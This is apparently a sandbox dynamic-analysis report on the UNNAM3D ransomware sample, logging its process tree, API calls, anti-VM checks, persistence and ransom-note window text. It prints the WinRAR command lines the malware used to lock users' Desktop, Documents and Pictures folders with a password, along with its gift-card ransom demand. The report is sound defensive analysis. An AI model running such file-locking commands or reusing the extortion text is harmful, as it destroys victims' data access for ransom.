UNNAM3D Ransomware | Sequential Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 94/100
Dynamic Analysis Report
Classification: Ransomware, Wiper, Dropper

gblyrzexggw.exe

Windows Exe (x86-32)

Created at 2019-04-02T12:03:00

...

Remarks (2/2)

(0x200000e): The overall sleep time of all monitored processes was truncated from "31 minutes, 2 seconds" to "40 seconds" to reveal dormant functionality.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Grouped Sequential

Remarks

(0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x15c Analysis Target High (Elevated) gblyrzexggw.exe "C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe" -
#2 0x948 Child Process High (Elevated) unnam3d.exe "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE" #1
#3 0x8d4 Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Desktop && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop * #2
#4 0x8dc Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Documents && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents * #2
#5 0x244 Child Process High (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Pictures && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures * #2
#6 0x340 Child Process High (Elevated) winrar.exe C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop * #3
#7 0x6ac Child Process High (Elevated) winrar.exe C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures * #5
#8 0xa20 Child Process High (Elevated) winrar.exe C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents * #4
#9 0x730 Autostart Medium unnam3d.exe "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE" -

Behavior Information - Sequential View

Process #1: gblyrzexggw.exe
602 0
»
Information Value
ID #1
File Name c:\users\whuoxysd\desktop\gblyrzexggw.exe
Command Line "C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe"
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:13, Reason: Analysis Target
Unmonitor End Time: 00:00:40, Reason: Self Terminated
Monitor Duration 00:00:26
OS Process Information
»
Information Value
PID 0x15c
Parent PID 0x65c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8E0
0x 8F0
0x 8FC
0x 914
0x 904
0x 8D8
0x 94C
0x 8BC
0x 944
0x C4
0x 11C
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
agiledotnetrt.dll 0x71C00000 0x721C1FFF Marked Writable - 32-bit - False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71F65181 False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71D98C14, 0x71C7EBF1, ... False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71DFA363 False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71E15B00, 0x71E246C7 False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71CAF180 False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71F7E0BA False
...
agiledotnetrt.dll 0x71C00000 0x721C1FFF Content Changed - 32-bit 0x71F5C000, 0x71F5BFC7 False
...
Hook Information
»
Type Installer Target Size Information Actions
Code agiledotnetrt.dll:+0xfc2e6 ntdll.dll:DbgBreakPoint+0x0 1 bytes -
...
Code agiledotnetrt.dll:+0x4b698 clrjit.dll:sxsJitStartup+0x1e3bd 4 bytes -
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe 7.71 MB MD5: 6ed8c24732529fccf847927c68fc0174
SHA1: c7155a3d2dd0ff0ff2f746b79998a5aabe79735f
SHA256: 567bdc9330d3ff2dfc138fa9f284ebb17a83a5ec0305d846474d7b30cbc36247
SSDeep: 196608:BWvq6ulMDaZkjYTGa44XFcxzkOGXDjD/E:IvXKDk8Sa44XFcxz3GXg 		False
...
C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll 2.10 MB MD5: db956a02daba647f229b01d56ea5d892
SHA1: 1c8d576d60f74b97ac0b7a419fd1ee710bf0ab8f
SHA256: 5b4f5e6cc52df647673b94249e5392e6f00cc5ffb7e1fc7c4219351762618cdd
SSDeep: 49152:tErk8yoNXvvBxlC/ziloFcbhXvmZF4nse2MmnbSUJmrnSloKbS:tErk8y6/Y/nFcVXgesEmOFzSfbS 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\whuoxysd\appdata\local\gdipfontcachev1.dat 106.27 KB MD5: a998686378c9bc64711f21878acf679d
SHA1: ae0784ba9a7ebe18f56625100c42f3f75c3342be
SHA256: 5f3cdc47addc45a9a6c6bddf8f81f2b52c9ae27947189b1faad3414dc74f5d6b
SSDeep: 768:Ve8mqoSHgTl3hohIqdqdsBzke0A8WitQBsclGYlTF6THsyx2:KqoSHgTl3hA51t0A8WitQBHOHBx2 		False
...
Threads
Thread 0x8e0
304 0
»
Category Operation Information Success Count Logfile
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp, type = file_attributes True 1
Fn
File Create Directory C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes False 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_type True 2
Fn
File Write filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 2197808 True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x76d60000 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x771a0000 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77de0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75c10000 True 1
Fn
Module Load module_name = shlwapi.dll, base_address = 0x77360000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x769b11a9 True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Debug Hide c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = IsUserAnAdmin, address_out = 0x75c644f5 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System, value_name = EnableLUA, data = 1 True 1
Fn
Debug Check for Presence c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\desktop\gblyrzexggw.exe False 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77dffda0 True 1
Fn
System Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value_name = DriverDesc, data = 83 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = VideoBiosVersion, data = 76 False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x77240000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\psapi.dll, base_address = 0x76e60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\version.dll, base_address = 0x75870000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77e0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlLeaveCriticalSection, address_out = 0x77e02270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlEnterCriticalSection, address_out = 0x77e022b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlInitializeCriticalSection, address_out = 0x77e12c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlReAllocateHeap, address_out = 0x77e21f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlSizeHeap, address_out = 0x77e13002 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Fn
Module Load module_name = clrjit.dll, base_address = 0x75260000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, function = getJit, address_out = 0x752af70e True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 260 True 1
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, desired_access = FILE_READ_DATA, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 510104, size_out = 510104 True 1
Fn
Data
Environment Get Environment String name = UKKED False 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:03:59 (UTC) True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x75010000 True 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e125dd True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19269942 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 9
Fn
Module Load module_name = RichEd20.DLL, base_address = 0x74df0000 True 1
Fn
Module Get Filename module_name = RichEd20.DLL, process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, file_name_orig = C:\Windows\system32\RichEd20.DLL, size = 260 True 1
Fn
File Get Info filename = C:\Windows\system32\RichEd20.DLL, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 2
Fn
Environment Get Environment String name = UKKED False 4
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Fn
Window Create window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 4
Fn
Environment Get Environment String name = UKKED False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe.config, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 6
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Fn
Window Create window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 19270142 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 2
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 21
Fn
System Get Cursor x_out = 424, y_out = 718 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 1
Fn
System Get Cursor x_out = 424, y_out = 718 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75010000 True 30
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
System Get Cursor x_out = 424, y_out = 718 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19270870 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 19270910 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 393324 False 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 393324 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -16, new_long = 33619968 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -20, new_long = 65536 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Fn
Window Create class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 1960780026 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 19270990 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -12, new_long = 393252 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 2
Fn
Window Create window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19272414 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 393646 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19272454 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 197042 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19272494 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197044 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19272534 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197046 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315686 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131514 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315750 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131512 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315790 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131518 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 1
Fn
Window Create window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961408713 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 19315830 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 131566 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74e70000 True 1
